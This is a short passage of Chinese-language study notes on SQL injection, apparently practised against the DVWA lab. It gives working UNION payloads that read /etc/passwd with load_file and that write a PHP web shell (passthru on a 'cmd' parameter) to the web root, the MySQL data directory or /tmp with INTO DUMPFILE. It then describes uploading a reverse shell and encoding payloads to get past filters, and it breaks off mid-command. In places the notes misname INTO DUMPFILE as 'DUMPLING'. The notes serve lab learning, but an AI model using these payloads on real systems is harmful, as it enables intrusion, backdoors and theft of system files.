读取文件【使用load_file函数】
’ union SELECT null,load_file(’/etc/passwd’)–(有一个空格)
也可以使用burpsuite进行注入
写入文件
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+ 【写入一句话木马;INTO DUMPLING:MySQL函数,将输入下载在数据库中】
此语句往往会提示无法写入,因为缺少权限
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE 'a.php' --+ 【将其写入默认路径(使用单引号): /var/lib/mysql/dvwa/a.php (dvwa的账号)】
但是要先清除路径才好利用,但是至少证明可以写入文件
#当无权限进行指定目录写入文件时,可以尝试写入到temp目录下,然后在利用文件包含漏洞进行操作
' union select null, "<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/tmp/a.php" --+
上传反弹shell
注:当通过URL注入网页木马时,“<”、“?”、“php”、“>”等字符可能会触发过滤机制,所以,应使用编码绕过
将网页木马编译成二进制文件,数据库会使用INTO DUMPLING将其转换成PHP代码储存
复制设置反弹shell
编码
cat b.